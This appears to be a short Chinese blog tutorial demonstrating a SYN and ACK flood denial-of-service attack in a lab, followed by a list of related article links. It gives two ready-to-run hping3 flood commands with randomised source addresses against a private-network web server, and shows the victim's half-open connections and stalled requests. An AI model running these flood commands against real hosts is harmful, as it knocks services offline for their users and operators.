DDOS直接攻击系统资源

0。0;2023-10-24 1:08

DDOS ------直接攻击系统资源

思路:

攻击机利用三次握手机制,产生大量半连接,挤占受害者系统资源,使其无法正常提供服务。

1、先体验下受害者的正常网速。在受害者主机上执行以下命令

(1)开启Apache。
systemctl start apache2

(2) 下载百度首页代码。发现近乎瞬间完成。
curl baidu.com

2、在攻击机上执行以下代码,发起syn flood和ack flood。

bash 复制代码 
hping3  --flood  --rand-source  -S  -p 80 192.168.237.133
hping3  --flood  --rand-source  -A  -p 80 192.168.237.133

3、在受害机上观察

(1)输入netstat -ant,可以看到很多的半链接

(2)尝试再次请求百度首页代码。
curl baidu.com

发现系统资源被挤占,久久得不到回复。

相关推荐
杨云龙UP1 小时前
SQL Server2022部署:Windows Server 2016下安装、SSMS配置、备份还原与1433端口放通全流程_20260508
运维·服务器·数据库·sql·sqlserver·2022
梦想与想象-广州大智汇1 小时前
自建docker加速镜像,使用 Cloudflare Workers/Pages 部署加速教程
运维·docker·容器
枳实-叶1 小时前
【Linux驱动开发】第四天:dmesg日志全解+驱动加载失败极速排查
linux·运维·驱动开发
武超杰2 小时前
Nginx从入门到精通
运维·nginx
weixin_704266052 小时前
Nginx 反向代理 + 6 种负载均衡策略
运维·nginx
fish_xk3 小时前
Linux开方工具
linux·运维·服务器
m0_738120724 小时前
应急响应(重点)——记一次某公司流量应急溯源分析(附带下载链接)
服务器·前端·数据库·安全·web安全·网络安全
中科三方5 小时前
输入域名后无法访问?教你快速区分域名解析问题与服务器问题
运维·服务器
internet Boy5 小时前
桌面运维面试常见问题及标准答案(完整版)
运维
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法04零基础教你claude code 接入 deepseek V405CC-Switch & Claude 基于 Linux 服务器安装使用指南06Linux 核弹级高危漏洞 CVE-2026-31431 完整修复指南07裂开!ChatGPT 居然开始要手机号验证,附详细解决方法08Dirtyfrag漏洞:我花了一下午搞清楚这个Linux内核提权漏洞到底在搞什么09CVE-2026-31431 (Copy Fail) 漏洞复现与验证记录102026 年 AI 辅助编程工具全景对比:Copilot、Cursor、Claude Code 与 Codex 深度解析